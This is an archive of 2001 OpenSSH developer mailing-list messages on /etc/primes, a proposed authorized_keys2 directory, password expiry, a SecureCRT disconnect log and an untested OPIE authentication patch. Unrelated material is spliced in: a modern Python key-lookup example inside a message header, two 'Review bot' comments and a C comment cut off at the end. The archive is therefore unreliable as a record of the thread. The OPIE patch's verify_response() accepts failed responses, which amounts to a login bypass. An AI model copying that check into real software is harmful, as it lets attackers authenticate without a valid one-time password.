In-Reply-To: <20010531131947.A258@bootp-20-219.bootp.virginia.edu>; from mipam@ibb.net on Thu, May 31, 2001 at 01:19:47PM -0400
References: <20010222111114.A4248@bootp-20-219.bootp.virginia.edu> <20010222171024.A1229@faui02.informatik.uni-erlangen.de> <20010222113220.C4248@bootp-20-219.bootp.virginia.edu> <20010222173409.A3276@faui02.informatik.uni-erlangen.de> <20010222114441.F4248@bootp-20-219.bootp.virginia.edu> <20010222175932.A3510@faui02.informatik.uni-erlangen.de> <20010318020636.A250@bootp-20-219.bootp.virginia.edu> <20010318124133.C23502@folly> <20010531131947.A258@bootp-20-219.bootp.virginia.edu>
Message-ID: <20010602102130.B14694@folly>

hi,

openssh's make install does copy the provided prime file to /etc/primes.

what distributions are broken?

On Thu, May 31, 2001 at 01:19:47PM -0400, Mipam wrote:
> I notice that a lot of openssh ports are installed without an /etc/primes.
> Not the fault of openssh, merely of the ppl who make a rpm, or port
> openssh natively in the os.
> And when another machine makes a connection to a sshd, the server tries to find
> an /etc/primes. Also in my case there is none.
> In the documentation there is hardly anything mentioned other than
> "Contains Diffie-Helman groups used for the ...."
> No note how to generate the primes file or whether it is a file that
> comes with the openssh source which you must manually plant in /etc
> for example. So i don't know what to do now, since i am not that much home
> in this subject, should i try to obtain a primes file somewhere,
> or should i generate a primes file, and if so, how?
> Bye,
>
> Mipam.

From markus.friedl at informatik.uni-erlangen.de Sun Jun 3 19:46:04 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sun, 3 Jun 2001 11:46:04 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from pekkas@netcore.fi on Sat, Jun 02, 2001 at 11:54:24AM +0300 References: Message-ID: <20010603114604.B24416@folly> On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote: > Root would not be the only one to profit from this; you would only need to > copy the pubkey file in the right dir (with a descriptive name if you > like!), and authorization would work without file editing. Also, if you > need to refresh just one key, you could just scp that one over, no need > to edit the file either. i don't understand why editing a file is hard. i think keeping a file in sync is simpler than syncing directories, especially deleting files. > What do you think -- would this be useful? Bloat? Could it be considered > to be merged if it was implemented? i don't think it's useful. ssh.com switched to a-key-per-file, but openssh and the traditional ssh use a-key-per-line and i don't want to support 2 different ways of doing things. > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not > print debug message: > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001 > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001 > @@ -26,6 +28,8 @@ > if (!f) { > /* Restore the privileged uid. */ > restore_uid(); > + packet_send_debug("Could not open %.900s for reading.", file); > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); > return 0; > } > if (options.strict_modes) { > > was this left out by design, or a leftover in auth-rsa.c ? they should be merged, and in the future, i don't want to see debug messages before a user is authenticated. From markus.friedl at informatik.uni-erlangen.de Sun Jun 3 20:49:19 2001 
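Pekka Savola's proposal above describes the lookup in one sentence (list the directory, disqualify names with odd characters, try the rest one by one until a key matches) and Markus Friedl's reply objects to supporting a second layout. The following is an added example, not OpenSSH code and not Pekka's patch, that implements that lookup in Python with the file checks a StrictModes-style server would want: a name whitelist, lstat so symlinks are not followed, rejection of group/world-writable files and of a writable directory. The directory name authorized_keys.d, the whitelist, the key-line pattern, the sample key blobs and all function names are assumptions for the demo; key types beyond ssh-rsa and ssh-dss are accepted only so the parser is not tied to the key types of 2001.

```python
"""Looking up a presented public key in an authorized_keys-style directory
(added example; not OpenSSH code)."""
import os
import re
import stat
import tempfile

# The character whitelist proposed in the thread: [0-9a-zA-Z_.@-]
SAFE_NAME = re.compile(r"^[0-9A-Za-z_.@-]+$")

# An authorized_keys line is "[options] type base64-blob [comment]". The options
# field contains no unquoted whitespace, so the first "type blob" pair is the key.
KEY_RE = re.compile(
    r"(?:^|\s)(ssh-rsa|ssh-dss|ssh-ed25519|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)")


def keys_in_file(path):
    """Yield (type, blob) pairs found in one key file; comments and blanks are skipped."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        for line in f:
            if line.lstrip().startswith("#"):
                continue
            m = KEY_RE.search(line)
            if m:
                yield m.group(1), m.group(2)


def lookup_in_key_dir(keydir, presented):
    """Return {"matched": <file name or None>, "skipped": [(name, reason), ...]}.

    presented is a (type, blob) tuple as offered by the client. Files are tried
    in sorted order; the first file holding the key wins and the scan stops."""
    dst = os.lstat(keydir)
    if not stat.S_ISDIR(dst.st_mode):
        raise NotADirectoryError(keydir)
    if dst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        # Same reasoning as StrictModes: a writable directory lets others add keys.
        raise PermissionError("%s is group/world writable" % keydir)

    report = {"matched": None, "skipped": []}
    for name in sorted(os.listdir(keydir)):
        path = os.path.join(keydir, name)
        if not SAFE_NAME.match(name):
            report["skipped"].append((name, "bad name"))
            continue
        st = os.lstat(path)                      # lstat: never follow symlinks
        if not stat.S_ISREG(st.st_mode):
            report["skipped"].append((name, "not a regular file"))
            continue
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            report["skipped"].append((name, "group/world writable"))
            continue
        if presented in set(keys_in_file(path)):
            report["matched"] = name
            return report
    return report


# Constructed sample blobs (base64-looking strings, not real keys).
ALICE = ("ssh-rsa", "AAAAB3NzaC1yc2EAAAADAQABAAAAgQDconstructedAliceKey")
ZED = ("ssh-dss", "AAAAB3NzaC1kc3MAAACBAPconstructedZedKey")
NOBODY = ("ssh-rsa", "AAAAB3NzaC1yc2EAAAADAQABAAAAgQDnotInTheDirectory")


def demo(presented):
    """Build a throwaway key directory with good and bad entries, then look up presented."""
    with tempfile.TemporaryDirectory() as tmp:
        keydir = os.path.join(tmp, "authorized_keys.d")
        os.mkdir(keydir, 0o700)
        files = {
            "bad name": "%s %s rejected-by-name\n" % ZED,           # space in the name
            "bob": "%s %s bob-but-world-writable\n" % ZED,
            "carol": "# carol's key\n%s %s carol@laptop\n" % ALICE,
            "zed@workstation": 'command="/bin/date" %s %s zed\n' % ZED,
        }
        for name, body in files.items():
            path = os.path.join(keydir, name)
            with open(path, "w") as f:
                f.write(body)
            os.chmod(path, 0o600)
        os.chmod(os.path.join(keydir, "bob"), 0o666)
        os.symlink(os.path.join(keydir, "carol"), os.path.join(keydir, "link"))
        return lookup_in_key_dir(keydir, presented)


if __name__ == "__main__":
    print(demo(ZED))
```

The early return on the first match is what Pekka's "until a matching key is found" implies; returning the file name rather than a bare boolean gives the server something to log, which is the main operational benefit of the one-key-per-file layout.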
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Sun, 3 Jun 2001 12:49:19 +0200
Subject: Handling of password & account expirations
In-Reply-To: <20010602221919.M25314@basm.cerias.purdue.edu>; from raj@cerias.purdue.edu on Sat, Jun 02, 2001 at 10:19:19PM -0500
References: <20010602221919.M25314@basm.cerias.purdue.edu>
Message-ID: <20010603124919.A14824@folly>

On Sat, Jun 02, 2001 at 10:19:19PM -0500, Brian Poole wrote:
> Since no one else has seemed concerned about this when I posted it on
> the OpenBSD mailing lists

i wrote:

% On Mon, May 14, 2001 at 03:20:57PM -0500, Brian Poole wrote:
% > My problem is this, OpenSSH does not respect account nor password
% > expirations by default (by respect I mean it totally ignores them,
% > it doesn't matter if they are set and have expired). Why?
% >
% > [...]
% >
% > This entire bit probably applies to rsh/rlogin as well, but I'm not
% > nearly as concerned about it as it isn't on by default nor used by
% > myself.
%
% both openssh and rlogin ignore this, so this suggests
% that the operating system does not support this feature
% at all.
%
% however, in the future openbsd will move to BSD_AUTH, so
% perhaps this feature will be supported on openbsd.

and indeed, this is handled by auth_approval in session.c
if BSD_AUTH is defined.

-m

From mugz at x-mafia.org Mon Jun 4 02:31:48 2001
From: mugz at x-mafia.org (mugz)
Date: Sun, 3 Jun 2001 12:31:48 -0400 (EDT)
Subject: another bug report
In-Reply-To: <20010602102854.F14694@folly>
Message-ID:

OK, I know some mailing lists don't like attachments, so I did as you asked
and have pasted the log to the end of this message. It is the log of a
user logging in with secureCRT and using the "disconnect" button to exit
the shell:

On Sat, 2 Jun 2001, Markus Friedl wrote:

> can you start
> $ sshd -d -d -d -p 1234
> and connect to port 1234 with securecrt?
>
> the traces could be of use to us.
>
>
> On Fri, Jun 01, 2001 at 02:09:57AM -0400, mugz wrote:
> >
> > I tracked this one down. I am running OpenSSH_2.9p1 and if a user logs in
> > with securecrt and uses the "disconnect" button to disconnect from the
> > shell I get this error in the log:
> >
> > Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill 16131: Operation not permitted
> > Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill 16131: Operation not permitted
> >
> > Also, when I type:
> >
> > last -30 | grep still
> >
> > It shows them as still logged in, even though they have long since
> > disconnected. This error does not occur if they use "exit" to exit the
> > shell, also I do not see this same error in PuTTY.
> >
> > mugz
> >
> >
>

debug1: Seeding random number generator
debug1: sshd version OpenSSH_2.9p1
debug1: private host key: #0 type 0 RSA1
debug3: No RSA1 key file /etc/ssh/ssh_host_rsa_key.
debug1: read PEM private key done: type RSA
debug1: private host key: #1 type 1 RSA
debug3: No RSA1 key file /etc/ssh/ssh_host_dsa_key.
debug1: read PEM private key done: type DSA
debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol
debug1: Bind to port 1234 on 0.0.0.0.
Server listening on 0.0.0.0 port 1234.
debug1: Server will not fork when running in debugging mode.
Connection from 137.79.89.118 port 1330
debug1: Client protocol version 2.0; client software version 3.0 SecureCRT (tm), a product of Van Dyke Technologies, Inc.
debug1: match: 3.0 SecureCRT (tm), a product of Van Dyke Technologies, Inc. pat ^3\.0 SecureCRT
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_2.9p1
debug1: Rhosts Authentication disabled, originating port not trusted.
debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: kex_parse_kexinit: diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-dss
debug2: kex_parse_kexinit: 3des-cbc
debug2: kex_parse_kexinit: 3des-cbc
debug2: kex_parse_kexinit: hmac-md5
debug2: kex_parse_kexinit: hmac-md5
debug2: kex_parse_kexinit: none
debug2: kex_parse_kexinit: none
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: mac_init: found hmac-md5
debug1: server_init_dispatch_20
debug1: server_input_channel_open: ctype session rchan 0 win 8192 max 8192
debug1: input_session_request
debug1: channel 0: new [server-session]
debug1: session_new: init
debug1: session_new: session 0
debug1: session_open: channel 0
debug1: session_open: session 0: link with channel 0
debug1: server_input_channel_open: confirm session
debug2: callback start
debug1: session_by_channel: session 0 channel 0
debug1: session_input_channel_req: session 0 channel 0 request pty-req reply 0
debug1: session_pty_req: session 0 alloc /dev/pts/2
debug2: tty_parse_modes: SSH2 n_bytes 46
debug2: tty_parse_modes: 1 3
debug2: tty_parse_modes: 5 4
debug2: tty_parse_modes: 4 21
debug2: tty_parse_modes: 8 17
debug2: tty_parse_modes: 9 19
debug2: tty_parse_modes: 10 26
debug2: tty_parse_modes: 12 18
debug2: tty_parse_modes: 13 23
debug2: tty_parse_modes: 14 22
debug2: callback done
debug2: callback start
debug1: session_by_channel: session 0 channel 0
debug1: session_input_channel_req: session 0 channel 0 request shell reply 0
debug1: channel 0: rfd 7 isatty
debug1: fd 7 setting O_NONBLOCK
debug1: fd 3 IS O_NONBLOCK
debug2: callback done
debug1: Setting controlling tty using TIOCSCTTY.
debug1: channel 0: rcvd close
debug1: channel 0: output open -> drain
debug1: channel 0: input open -> closed
debug1: channel 0: close_read
debug2: channel 0: no data after CLOSE
debug1: channel 0: obuf empty
debug1: channel 0: output drain -> closed
debug1: channel 0: close_write
debug1: channel 0: send close
debug1: channel 0: is dead
debug1: channel_free: channel 0: status: The following connections are open:
  #0 server-session (t4 r0 i8/0 o128/0 fd -1/-1)
debug1: channel_free: channel 0: dettaching channel user
debug1: session_by_channel: session 0 channel 0
debug1: session_close_by_channel: channel 0 kill 11786
debug1: Received SIGCHLD.
debug3: tvp!=NULL kid 1 mili 100
debug1: session_by_pid: pid 11786
debug1: session_pty_cleanup: session 0 release /dev/pts/2
debug1: session_free: session 0 pid 11786
Connection closed by remote host.
Closing connection to 137.79.89.118

From wichert at cistron.nl Mon Jun 4 02:50:02 2001
From: wichert at cistron.nl (Wichert Akkerman)
Date: Sun, 3 Jun 2001 18:50:02 +0200
Subject: OPIE support patch
Message-ID: <20010603185002.C13880@cistron.nl>

I just cobbled up a little patch to add support for OPIE to OpenSSH.
Currently untested, but feedback is welcome.

Wichert.

-- 
 _________________________________________________________________
/ Nothing is fool-proof to a sufficiently talented fool           \
| wichert at cistron.nl                    http://www.liacs.nl/~wichert/ |
| 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0  2805 3CB8 9250 2FA3 BC2D |

-------------- next part --------------
diff -wur org/openssh-2.5.2p2/ChangeLog openssh-2.5.2p2/ChangeLog
--- org/openssh-2.5.2p2/ChangeLog Thu Mar 22 06:04:12 2001
+++ openssh-2.5.2p2/ChangeLog Sun Jun 3 18:37:17 2001
@@ -1,3 +1,6 @@
+20010603
+ - (wta) Add OPIE support
+
 20010322
 - (djm) Better AIX no tty fix, spotted by Gert Doering
 - (djm) Released 2.5.2p2
diff -wur org/openssh-2.5.2p2/acconfig.h openssh-2.5.2p2/acconfig.h
--- org/openssh-2.5.2p2/acconfig.h Sat Mar 17 02:15:38 2001
+++ openssh-2.5.2p2/acconfig.h Sun Jun 3 18:36:47 2001
@@ -184,6 +184,9 @@
 /* Define if you want AFS support */
 #undef AFS
+/* Define if you want OPIE support */
+#undef OPIE
+
 /* Define if you want S/Key support */
 #undef SKEY
diff -wur org/openssh-2.5.2p2/auth-chall.c openssh-2.5.2p2/auth-chall.c
--- org/openssh-2.5.2p2/auth-chall.c Mon Mar 5 07:59:27 2001
+++ openssh-2.5.2p2/auth-chall.c Sun Jun 3 18:34:43 2001
@@ -67,7 +67,7 @@
 debug("verify_response: <%s> = <%d>", response, authok);
 return authok != 0;
 }
-#else
+#else /* BSD_AUTH */
 #ifdef SKEY
 #include
@@ -88,6 +88,25 @@
 skey_haskey(authctxt->pw->pw_name) == 0 &&
 skey_passcheck(authctxt->pw->pw_name, response) != -1);
 }
+#else /* SKEY */
+#ifdef OPIE
+#include
+
+char *
+get_challenge(Authctxt *authctxt, char *devs)
+{
+ static char challenge[OPIE_CHALLENGE_MAX+64];
+ if (opiechallenge(&authctxt->opie_data, authxtxt->user, challenge) != 0)
+ return NULL;
+ strlcat(challenge, "\nOPIE Password: ", sizeof challenge);
+ return challenge;
+}
+int
+verify_response(Authctxt *authctxt, char *response)
+{
+ return authctxt->valid && opieverify(&authctxt->opie_data, response);
+}
+
 #else
 /* not available */
 char *
@@ -100,5 +119,5 @@
 {
 return 0;
 }
-#endif
-#endif
+#endif /* !SKEY */
+#endif /* !BSD_AUTH */
diff -wur org/openssh-2.5.2p2/auth.h openssh-2.5.2p2/auth.h
--- org/openssh-2.5.2p2/auth.h Mon Mar 5 06:56:41 2001
+++ openssh-2.5.2p2/auth.h Sun Jun 3 18:27:18 2001
@@ -35,6 +35,10 @@
 #include
 #endif
+#ifdef OPIE
+#include
+#endif
+
 typedef struct Authctxt Authctxt;
 struct Authctxt {
 int success;
@@ -48,6 +52,9 @@
 char *style;
 #ifdef BSD_AUTH
 auth_session_t *as;
+#endif
+#ifdef OPIE
+ struct opie opiedata;
 #endif
 };
diff -wur org/openssh-2.5.2p2/configure.in openssh-2.5.2p2/configure.in
--- org/openssh-2.5.2p2/configure.in Mon Mar 19 00:09:28 2001
+++ openssh-2.5.2p2/configure.in Sun Jun 3 18:36:22 2001
@@ -473,6 +473,31 @@
 )
 LIBS="$LIBS $KLIBS"
+# Check whether user wants OPIE support
+OPIE_MSG="no"
+AC_ARG_WITH(opie,
+ [ --with-opie=PATH Enable OPIE support],
+ [
+ if test "x$withval" != "xno" ; then
+
+ if test "x$withval" != "xyes" ; then
+ CPPFLAGS="$CPPFLAGS -I${withval}/include"
+ LDFLAGS="$LDFLAGS -L${withval}/lib"
+ fi
+
+ AC_DEFINE(OPIE)
+ LIBS="-lopie $LIBS"
+ OPIE_MSG="yes"
+
+ AC_CHECK_FUNC(opiechallenge,
+ [],
+ [
+ AC_MSG_ERROR([** Incomplete or missing OPIE libraries.])
+ ])
+ fi
+ ]
+)
+
 # Check whether user wants S/Key support
 SKEY_MSG="no"
 AC_ARG_WITH(skey,

From markus.friedl at informatik.uni-erlangen.de Mon Jun 4 05:35:24 2001
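Review bot: in the auth-chall.c hunk `@@ -88,6 +88,25 @@`, `get_challenge()` dereferences `authxtxt->user`, a typo for `authctxt->user` that stops the OPIE build from compiling, and `verify_response()` returns `authctxt->valid && opieverify(&authctxt->opie_data, response)`, passing the library's raw return value through as the verdict. `opieverify()` returns 0 on success, so as written a correct response evaluates to 0 (rejected) and a failed check to non-zero (accepted). Write the comparison explicitly, as the S/Key branch just above does with `skey_passcheck(...) != -1`, for example `return authctxt->valid && opieverify(&authctxt->opie_data, response) == 0;`. The `#include` after `#ifdef OPIE` also lost its header name in the archive, so the patch as posted cannot be applied without repair.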
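Review bot: the auth.h hunk `@@ -48,6 +52,9 @@` adds the member as `struct opie opiedata;`, while both OPIE functions in auth-chall.c use `authctxt->opie_data`; one of the two spellings has to change or the build breaks as soon as OPIE is defined. Since the hunk shows `opiechallenge()` filling this member and `opieverify()` reading it back in a later call, a one-line comment on the member saying that it carries the challenge state between the two steps would help the next reader.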
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Sun, 3 Jun 2001 21:35:24 +0200
Subject: another bug report
In-Reply-To: ; from mugz@x-mafia.org on Sun, Jun 03, 2001 at 12:31:48PM -0400
References: <20010602102854.F14694@folly>
Message-ID: <20010603213523.A4471@folly>

On Sun, Jun 03, 2001 at 12:31:48PM -0400, mugz wrote:
>
> OK, I know some mailing lists don't like attachments, so I did as you asked
> and have pasted the log to the end of this message. It is the log of a
> user logging in with secureCRT and using the "disconnect" button to exit
> the shell:

i don't see an error message in the log file.

From raj at cerias.purdue.edu Mon Jun 4 05:42:13 2001
From: raj at cerias.purdue.edu (Brian Poole)
Date: Sun, 3 Jun 2001 14:42:13 -0500
Subject: Handling of password & account expirations
Message-ID: <20010603144212.A9405@basm.cerias.purdue.edu>

Blarg, this should have gone to the list, not to Markus direct.

----- Forwarded message from Brian Poole -----

Date: Sun, 3 Jun 2001 14:40:22 -0500
From: Brian Poole
To: Markus Friedl
Subject: Re: Handling of password & account expirations

Quoting Markus Friedl (markus.friedl at informatik.uni-erlangen.de) from 3 June 2001:
> % however, in the future openbsd will move to BSD_AUTH, so
> % perhaps this feature will be supported on openbsd.
>
> and indeed, this is handled by auth_approval in session.c
> if BSD_AUTH is defined.

Sorry, it seemed a little nebulous of a response. You did reply though
and I'll apologize for saying that no one had replied.

I've personally been unable to find more information on BSD_AUTH so I
can't say I'm well educated on how it works. I'm very glad that it
closes this door on OpenBSD.

While this no longer applies to OpenBSD now that we have moved to
BSD_AUTH I believe this is still an issue with OpenSSH in the portable
release, correct? We can't expect {Linux,Solaris,} to have BSD_AUTH can we?

Your response is appreciated,

-b

----- End forwarded message -----

From rob at hagopian.net Mon Jun 4 07:08:15 2001
From: rob at hagopian.net (Rob Hagopian)
Date: Sun, 3 Jun 2001 17:08:15 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010603114604.B24416@folly>
Message-ID:

My $0.02 is that I like it, and I find it easier to keep track of the keys
and where they came from by having a directory format... could we at least
put the patch in contrib?
-Rob

On Sun, 3 Jun 2001, Markus Friedl wrote:

> On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote:
> > Root would not be the only one to profit from this; you would only need to
> > copy the pubkey file in the right dir (with a descriptive name if you
> > like!), and authorization would work without file editing. Also, if you
> > need to refresh just one key, you could just scp that one over, no need
> > to edit the file either.
>
> i don't understand why editing a file is hard.
> i think keeping a file in sync is simpler than
> syncing directories, especially deleting files.
>
> > What do you think -- would this be useful? Bloat? Could it be considered
> > to be merged if it was implemented?
>
> i don't think it's useful. ssh.com switched to a-key-per-file,
> but openssh and the traditional ssh use a-key-per-line
>
> and i don't want to support 2 different ways of doing things.
>
> > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not
> > print debug message:
> > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001
> > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001
> > @@ -26,6 +28,8 @@
> > if (!f) {
> > /* Restore the privileged uid. */
> > restore_uid();
> > + packet_send_debug("Could not open %.900s for reading.", file);
> > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable.");
> > return 0;
> > }
> > if (options.strict_modes) {
> >
> > was this left out by design, or a leftover in auth-rsa.c ?
>
> they should be merged, and in the future, i don't
> want to see debug messages before a user is authenticated.
>

From jmknoble at jmknoble.cx Mon Jun 4 07:27:48 2001
From: jmknoble at jmknoble.cx (Jim Knoble)
Date: Sun, 3 Jun 2001 16:27:48 -0500
Subject: Possible bug in openssh configuration file
In-Reply-To: <3B160B15.8DC80CC2@obs.unige.ch>; from Alain.Aubord@obs.unige.ch on Thu, May 31, 2001 at 11:12:53AM +0200
References: <3B160B15.8DC80CC2@obs.unige.ch>
Message-ID: <20010603162748.A11088@zax.half.pint-stowp.cx>

Circa 2001-May-31 11:12:53 +0200 dixit Alain Aubord:

: Dear Sirs,
: I was trying to compile openssh for Solaris 2.8 in 64bits mode.
: For that, I have defined the variable CFLAGS with the following value
: "-fast -I/isdc/include -L/isdc/lib -xtarget=ultra -xarch=v9" before
: running the configure command.

Some of those options shouldn't be in CFLAGS; they should be in
LDFLAGS. I don't know which compiler you're using (doesn't look like
gcc), but probably you mean:

  CFLAGS="-fast -I/isdc/include -xtarget=ultra -xarch=v9" \
  LDFLAGS="-fast -L/isdc/lib -xtarget=ultra -xarch=v9" \
  ./configure --prefix=...

: All goes correctly except that the command for doing the link of
: executable is not called with the content of variable "CFLAGS" (as you
: can see in the following extract of compile log). This is annoying since
: the linking can not be done (without correct parameter, 32bits linking
: is done). The solution I have used is to do the link manually with the
: content of the variable CFLAGS and that has worked. But I have spent
: some time to find that.

You need to use LDFLAGS for link-time options; CFLAGS is for
compile-time options (and CPPFLAGS is often used for preprocessor-time
options, such as -I or -D).

-- 
jim knoble | jmknoble at jmknoble.cx | http://www.jmknoble.cx/
(GnuPG fingerprint: 31C4:8AAC:F24E:A70C:4000::BBF4:289F:EAA8:1381:1491)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 249 bytes
Desc: not available
Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010603/2aed611e/attachment.bin

From jmknoble at jmknoble.cx Mon Jun 4 07:43:58 2001
From: jmknoble at jmknoble.cx (Jim Knoble)
Date: Sun, 3 Jun 2001 16:43:58 -0500
Subject: authorized_keys2 directory idea
In-Reply-To: <20010603114604.B24416@folly>; from markus.friedl@informatik.uni-erlangen.de on Sun, Jun 03, 2001 at 11:46:04AM +0200
References: <20010603114604.B24416@folly>
Message-ID: <20010603164358.B11088@zax.half.pint-stowp.cx>

Circa 2001-Jun-03 11:46:04 +0200 dixit Markus Friedl:

: i don't understand why editing a file is hard.

Editing a file is hard for many inexperienced users. Especially a file
that contains very long lines filled with what appears to be meaningless
random letters and numbers.

Using a directory format has the potential to make it significantly
easier for users to install public keys onto a remote system. Instead
of having to use a complicated set of shell commands such as:

  cat ~/.ssh/identity.pub |ssh remote-host 'cat >>~/.ssh/authorized_keys2'

(remember that ssh-copy-id only works for rsa1 keys), you can simply do:

  scp -p ~/.ssh/identity.pub remote-host:.ssh/authorized_keys2.d/local-host

Once they understand scp, inexperienced users can easily manage their
own public keys. That's a big win for everyone.

: i think keeping a file in sync is simpler than syncing directories,
: especially deleting files.

Heard of rsync? All you need is:

  rsync -av --delete master-key-repository/* \
    user at remote-host:.ssh/authorized_keys2.d/

Alternatively:

  ssh remote-host 'cd .ssh/authorized_keys2.d; cvs update'

The file-based format could even stay there without a problem: Simply
read ~/.ssh/authorized_keys2 first, then look for
~/.ssh/authorized_keys2.d/* and read them. Existing practice doesn't
have to change.

[Pekka Savola wrote:]
: > What do you think -- would this be useful? Bloat? Could it be considered
: > to be merged if it was implemented?
:
: i don't think it's useful. ssh.com switched to a-key-per-file,
: but openssh and the traditional ssh use a-key-per-line

Myself, i think it's a fantastic idea.
Both experienced and inexperienced users stand to benefit.

-- 
jim knoble | jmknoble at jmknoble.cx | http://www.jmknoble.cx/
(GnuPG fingerprint: 31C4:8AAC:F24E:A70C:4000::BBF4:289F:EAA8:1381:1491)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 249 bytes
Desc: not available
Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010603/eb971a1d/attachment.bin

From pekkas at netcore.fi Mon Jun 4 07:52:50 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Mon, 4 Jun 2001 00:52:50 +0300 (EEST)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010603114604.B24416@folly>
Message-ID:

On Sun, 3 Jun 2001, Markus Friedl wrote:
> On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote:
> > Root would not be the only one to profit from this; you would only need to
> > copy the pubkey file in the right dir (with a descriptive name if you
> > like!), and authorization would work without file editing. Also, if you
> > need to refresh just one key, you could just scp that one over, no need
> > to edit the file either.
>
> i don't understand why editing a file is hard.
> i think keeping a file in sync is simpler than
> syncing directories, especially deleting files.

Yes, keeping a file 100% in sync is way easier. But in real situations,
you're often faced with the fact that e.g. 60-90% of the keys are the same,
and the rest vary. Then syncing is a bit more difficult. Editing is also
a bigger (ie: interactive) process when it has to be done on many hosts.

A problem is backup files if you edit keys with an editor, ie. ones ending
in e.g. ~ or # (depending on the editor). Then if you just delete the base
key, the results might be unexpected. To counter this, filenames would be
scanned and only those that contain only legal characters would pass.

> > What do you think -- would this be useful? Bloat? Could it be considered
> > to be merged if it was implemented?
>
> i don't think it's useful. ssh.com switched to a-key-per-file,
> but openssh and the traditional ssh use a-key-per-line

I wasn't aware ssh.com is doing something like this too. So it might be
something to be done sooner or later, though.

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                   not those you stumble over and fall"
Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords

From pekkas at netcore.fi Mon Jun 4 07:57:13 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Mon, 4 Jun 2001 00:57:13 +0300 (EEST)
Subject: authorized_keys2 directory idea
In-Reply-To: <20010603164358.B11088@zax.half.pint-stowp.cx>
Message-ID:

On Sun, 3 Jun 2001, Jim Knoble wrote:
> Circa 2001-Jun-03 11:46:04 +0200 dixit Markus Friedl:
>
> : i don't understand why editing a file is hard.
>
> Editing a file is hard for many inexperienced users. Especially a file
> that contains very long lines filled with what appears to be meaningless
> random letters and numbers.
>
> Using a directory format has the potential to make it significantly
> easier for users to install public keys onto a remote system. Instead
> of having to use a complicated set of shell commands such as:
>
> cat ~/.ssh/identity.pub |ssh remote-host 'cat >>~/.ssh/authorized_keys2'

And there is another complication here (which often goes wrong with novice
users): the file's permissions usually go wrong due to common non-strict
umask when the file is being created.

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                   not those you stumble over and fall"
Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords

From drosih at rpi.edu Mon Jun 4 08:26:41 2001
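The loader that Jim and Pekka sketch in the messages above (read the single authorized_keys2 file first, then the files under authorized_keys2.d/, admit only filenames built from legal characters so that editor backups such as `foo~` or `#foo#` are never treated as keys, and refuse a key file whose permissions went wrong at creation) can be shown as a small C program. This is an added example, not OpenSSH code or any poster's patch; the requirement that directory entries end in `.pub`, the `[A-Za-z0-9._-]` character set, the per-file mode rule, the function names and the sample key lines are all assumptions constructed for the example.

```c
/*
 * Added example, not OpenSSH code: the authorized_keys2.d loader sketched in this
 * thread. It reads <sshdir>/authorized_keys2 first, then those entries of
 * <sshdir>/authorized_keys2.d whose names use only [A-Za-z0-9._-] and end in
 * ".pub" (an assumed convention), so editor backups like "laptop.pub~" or
 * "#laptop.pub#" are ignored, and it skips any file that is not a regular file
 * writable only by its owner. All names, paths and key lines are constructed.
 */
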